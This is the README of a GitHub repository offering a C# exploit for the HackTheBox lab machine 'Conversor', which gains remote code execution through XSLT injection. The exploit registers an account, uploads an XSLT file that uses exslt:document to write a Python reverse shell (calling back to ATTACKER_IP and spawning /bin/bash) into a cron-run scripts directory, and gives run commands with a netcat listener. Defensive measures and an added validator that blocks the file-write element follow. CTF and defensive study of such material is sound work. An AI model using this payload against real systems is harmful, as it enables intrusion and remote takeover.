ChrisLPJones/conversor-exploit
Conversor - HackTheBox Machine Exploit


A C# exploit implementation for the HackTheBox machine "Conversor" that achieves Remote Code Execution through XSLT injection via the exslt:document extension.

Overview

Conversor is an Easy-rated Linux machine on HackTheBox that features a web application vulnerable to XSLT injection. This exploit chains the following steps to obtain an initial foothold:

  1. Registering a user account on the web application
  2. Obtaining an authenticated session cookie
  3. Uploading a malicious XSLT payload that leverages the exslt:document extension
  4. Writing a reverse shell payload to disk
  5. Waiting for a scheduled cron job to execute the payload

Vulnerability Details

Vulnerability Classification

  • Vulnerability Type: XSLT Server-Side Injection (CWE-91)
  • Attack Vector: XSLT Extension Functions Abuse
  • Impact: Remote Code Execution
  • Difficulty: Easy

Technical Details

The application allows users to upload XML and XSLT files for transformation. The vulnerability exists because:

  1. The XSLT processor has the exslt:document extension enabled
  2. No input sanitization is performed on XSLT content
  3. The web application has write permissions to the scripts directory
  4. A cron job periodically executes Python scripts from this directory

The exploit abuses the exslt:document extension to write arbitrary files to the filesystem:

<exploit:document href="/path/to/file" method="text">
    <!-- Malicious content here -->
</exploit:document>

Usage

Prerequisites

  • .NET 6.0 or higher
  • Network access to the target machine
  • Netcat or similar listener for receiving the reverse shell

Host Configuration

Before running the exploit, add the target to your /etc/hosts file:

echo "10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts

Compilation

# Clone the repository
git clone https://github.com/chrislpjones/conversor-exploit.git
cd conversor-exploit

# Build the project
dotnet build

Execution

dotnet run -- -t <target_url> -r <your_ip> -p <your_port>

Parameters:

  • -t : Target URL (must use http://conversor.htb)
  • -r : Your callback IP address for the reverse shell
  • -p : Your callback port for the reverse shell

Example

# Start your listener in one terminal
nc -lvnp 4444

# Run the exploit in another terminal
dotnet run -- -t http://conversor.htb -r 10.10.14.5 -p 4444

Note: You must use conversor.htb as the target URL, not the IP address directly.

Expected Output

[*] Registering new user account...
[+] User registered successfully
[*] Authenticating and obtaining session cookie...
[+] Session cookie obtained
[*] Crafting malicious XSLT payload...
[*] Uploading payload to target...
[+] Payload uploaded successfully

  Start your listener in a separate terminal:

    nc -lvnp 4444

[!] Note: Payload executes via cron job (may take up to 60 seconds)

Technical Implementation

Exploit Flow

┌─────────────────────┐
│  Register Account   │
│  (user3/password1)  │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│   Authenticate &    │
│  Obtain Session     │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Craft XSLT Payload │
│  with exslt:doc     │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Upload Malicious   │
│  XML + XSLT Files   │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  XSLT Transformation│
│  Writes exploit.py  │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│   Cron Job Executes │
│   Reverse Shell     │
└─────────────────────┘

Key Components

1. User Registration

// Creates a new user account or uses existing credentials
var formData = new FormUrlEncodedContent([
    new KeyValuePair<string, string>("username", "user3"),
    new KeyValuePair<string, string>("password", "password1")
]);

2. Authentication

// Obtains session cookie for authenticated requests
HttpResponseMessage response = await http.PostAsync(url, formData);
string cookie = response.Headers.GetValues("Set-Cookie").First();

3. Malicious XSLT Payload

<exploit:document href="/var/www/conversor.htb/scripts/exploit.py" method="text">
<![CDATA[
import socket,os,pty
s=socket.socket()
s.connect(("ATTACKER_IP",PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
]]>
</exploit:document>

Defensive Measures

Organizations can protect against this class of attack in the following ways:

  1. Disable Dangerous XSLT Extensions: Explicitly disable exslt:document and other file-writing extensions
  2. Input Validation: Sanitize and validate all XSLT content before processing
  3. Principle of Least Privilege: Run XSLT processors with minimal filesystem permissions
  4. Sandboxing: Process XSLT transformations in isolated environments
  5. Content Security Policy: Implement strict CSP headers
  6. Regular Security Audits: Review code for injection vulnerabilities

Secure XSLT Configuration Example

lxml's extensions argument registers additional Python extension functions; it cannot switch off the built-in EXSLT support, so mapping the document element to None does not prevent the write. File and network writes are withheld from the engine through XSLTAccessControl instead:

# Deny file and network writes from the XSLT engine (lxml); exsl:document then fails
from lxml import etree

access_control = etree.XSLTAccessControl.DENY_WRITE  # use DENY_ALL if document() reads are not needed either
transformer = etree.XSLT(xslt_tree, access_control=access_control)
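The input-validation measure above, as an added defensive example that is not part of this repository: a standard-library pre-check that refuses an uploaded stylesheet before it reaches the transformer if it uses the EXSLT document element, XSLT include/import, or resource-reading XPath functions. The two sample stylesheets are constructed; the denied-element set and function names are this example's own choices.

```python
"""Pre-transformation validator for user-supplied XSLT (added defensive example).
Refuses stylesheets using the EXSLT document element (the file-write primitive
abused on Conversor) or other constructs that reach outside the input document.
Matching is on namespace URI, so renaming the prefix does not evade it."""
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
EXSLT_COMMON_NS = "http://exslt.org/common"
# Elements that can write files or pull in external stylesheet code.
DENIED_ELEMENTS = {
    f"{{{EXSLT_COMMON_NS}}}document",  # exsl:document: writes a result tree to href
    f"{{{XSL_NS}}}result-document",    # XSLT 2.0 equivalent
    f"{{{XSL_NS}}}include",            # external stylesheet inclusion
    f"{{{XSL_NS}}}import",
}
# XPath functions that read arbitrary local or remote resources.
DENIED_XPATH_FUNCTIONS = ("document(", "unparsed-text(", "doc(")


def find_violations(xslt_text: str) -> list[str]:
    """Return the reasons the stylesheet must be refused (empty list means OK)."""
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag not in (f"{{{XSL_NS}}}stylesheet", f"{{{XSL_NS}}}transform"):
        return [f"root element is {root.tag}, not an XSLT stylesheet"]
    problems = []
    for elem in root.iter():  # walks every element regardless of prefix used
        if elem.tag in DENIED_ELEMENTS:
            problems.append(f"forbidden element {elem.tag} (href={elem.get('href')!r})")
        for attr in ("select", "test", "match"):
            expr = elem.get(attr)
            if expr and any(fn in expr for fn in DENIED_XPATH_FUNCTIONS):
                problems.append(f"forbidden XPath call in {attr}={expr!r}")
    return problems


def is_safe_stylesheet(xslt_text: str) -> bool:
    return not find_violations(xslt_text)


# Constructed samples: a benign transform and one shaped like the Conversor payload.
BENIGN_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><out><xsl:value-of select="//title"/></out></xsl:template>
</xsl:stylesheet>"""
MALICIOUS_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exploit="http://exslt.org/common" extension-element-prefixes="exploit">
  <xsl:template match="/"><exploit:document href="/tmp/dropped.txt" method="text">
    constructed marker</exploit:document></xsl:template></xsl:stylesheet>"""
```

ElementTree offers no protection against entity-expansion attacks, so parse untrusted uploads with defusedxml in production. Treat this scan as a supplement to the access-control setting in the transformer, not a replacement for it.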


Legal Disclaimer

This exploit is provided for educational purposes only. It is designed for use in authorized penetration testing engagements and CTF competitions like HackTheBox.

DO NOT use this tool against systems you do not own or have explicit written permission to test. Unauthorized access to computer systems is illegal and punishable under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation worldwide.

The author assumes no liability for misuse of this tool.

Contributing

Contributions, improvements, and suggestions are welcome! Please feel free to:

  • Open an issue for bug reports
  • Submit pull requests for enhancements
  • Share alternative exploitation techniques

License

This project is licensed under the MIT License - see the LICENSE file for details.

Author

Christian - Penetration Tester & Security Researcher

  • Specialized in web application security and exploitation
  • Active participant in CTF challenges and HackTheBox platforms
  • Check out my other security research and tools

If you found this exploit useful, please consider giving it a star on GitHub!
